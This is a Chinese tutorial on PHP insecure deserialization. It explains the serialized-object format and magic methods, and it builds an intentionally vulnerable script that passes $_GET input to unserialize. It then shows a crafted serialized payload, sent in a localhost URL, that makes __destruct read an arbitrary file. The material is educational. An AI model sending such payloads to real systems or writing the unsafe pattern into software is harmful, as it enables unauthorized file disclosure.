serialize:序列化
unserialize: 反序列化
簡單解釋:
serialize 把一個對象轉成字符串形式, 可以用於保存
unserialize 把serialize序列化后的字符串變成一個對象
我們來看一個實例:
<?php class F{ public $filename='a.txt'; } $a = new F(); echo $a->filename.'<br />'; echo serialize($a);
上面例子是創建一個類, 並輸出 filename的值 , 最后輸出序列化字符串:
關於這一串:
O:1:"F":1:{s:8:"filename";s:5:"a.txt";}
簡單解釋:
O: 對像, 1 對象名長度, 就是這里的 'F'
s: 字符串
8: 字符串長度, 后面的filename為字符串定義時的名字
詳細解釋可以百度找資料看, 因為這個不是本文重點。
這里你可以看到, 我代碼里的類定義為: class F, 這個序列化就是 F, 我定義變量名字是filename, 它這里也是 filename, 我們可以修改看看:
可以看到序列化后的變量名字變成 filenameF 了。
看下面代碼:
<?php class F{ public $filenameF='bcda.txt'; } $a = new F(); echo $a->filenameF.'<br />'; echo serialize($a);
這是另一個代碼:
<?php class F{ public $filename='a.txt'; } $a = new F(); echo $a->filename.'<br />'; echo serialize($a);
這兩個代碼定義的類一樣, 只是屬性不一樣。
當我們用如下代碼反序列時:
<?php class F{ public $filename='a.txt'; function __destruct(){ echo '--------------><br />'; } } $a = new F(); echo $a->filename.'<br />'; echo serialize($a); $b = unserialize('O:1:"F":1:{s:9:"filenameF";s:8:"bcda.txt";}'); echo '<br />'.$b->filename; echo '<br />'.$b->filenameF;
可以看到析構函數輸出了兩次, 說明這兩個應是同一個類, 只是 $b 多出了一個屬性 filenameF, filename可直常輸出, filenameF也可正常輸出。
在PHP中, 類被創建或消失后, 都會自動的執行某些函數, 如:
__construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toString(), __invoke(), __set_state(), __clone(), and __autoload()
或自動執行某些方法, 如:
Exception::__toString ErrorException::__toString DateTime::__wakeup ReflectionException::__toString ReflectionFunctionAbstract::__toString ReflectionFunction::__toString ReflectionParameter::__toString ReflectionMethod::__toString ReflectionClass::__toString ReflectionObject::__toString ReflectionProperty::__toString ReflectionExtension::__toString LogicException::__toString BadFunctionCallException::__toString BadMethodCallException::__toString DomainException::__toString InvalidArgumentException::__toString LengthException::__toString OutOfRangeException::__toString RuntimeException::__toString
我們就可以利用這種自動執行某些函數或方法的特性,執行我們相要的操作。
我們創建如下代碼:
<?php class F{ public $filename='d:\\phpstudy\\www\\a.txt'; #$filename為public
function __destruct(){ $data = readfile($this->filename); echo $data; } } $a = new F(); echo $a->filename.'<br />';
運行時如下所示:
因為 __destruct 析構函數在一個類對象消失時, 會自動執行。 所以上面的代碼當運行結束時, 類對象 $a 消失后, 代碼會自動執行 __destruct() 函數。
假如我們創建一個如下的測試代碼:
<?php class F{ public $filename='d:\\phpstudy\\www\\a.txt'; #$filename為public
function __destruct(){ $data = readfile($this->filename); echo $data.'<br />'; } } $a = new F(); echo $a->filename.'<br />'; $b = unserialize($_GET[a]);
這代碼中我們用unserialize反序列一個字符串變成一個類對象, 也就是說這個代碼中, 會有兩個類對象, 一個是$a, 一個是用戶可控的$b ($b 中的filename可控, 因為class F中的 filename為public)。
當代碼運行結束時, 會運行兩個析構函數。 第一次運行的析構函數中, filename為$a中默認的 'd:\\phpstudy\\www\\a.txt', 第二個因為是從$_GET[a]獲得字符串, 所以我們可以控制第二個對象中的filename。
從而使得 __destruct 函數可以讀取到我們想要讀的文件。
下面這個代碼中的類跟上面代碼的類一樣, 不同的地方是我們修改了filename的值, 並生成序列化字符串:
<?php class F{ public $filename='a.txt'; } $a = new F(); $a->filename = 'd:\\phpstudy\\www\\2.txt'; echo serialize($a);
生成的序列化字符串為:
O:1:"F":1:{s:8:"filename";s:21:"d:\phpstudy\www\2.txt";}
再創建一個 2.txt 文件用於測試, 內容為:
password
現在,我們已改變了原來的 filename值,並生成了序列化字符串, 再把它發送到測試代碼中去:
http://localhost/11.php?a=O:1:%22F%22:1:{s:8:%22filename%22;s:21:%22d:\phpstudy\www\2.txt%22;}
測試代碼除了有對象 $a 外, 還反序列化創建了一個對象 $b, 而這個$b中的屬性filename被我們修改了。
最后運行兩次 __destruct析構函數時, 一次讀取了 a.txt, 另一次讀取了 2.txt。
最后總結一下:
<?php include "xxx.php";#此文件中有類定義, 有魔術函數或方法, 且輸入參數能被控制
class Classname{ #存在有害魔術函數或方法,且輸入參數能被控制
} do something...
do something...
do something...
#存在反序列化函數
unserialize('用戶輸入有害參數未過濾') do something...
do something...
do something...
參考:
http://blog.csdn.net/qq_32400847/article/details/53873275
http://www.freebuf.com/vuls/80293.html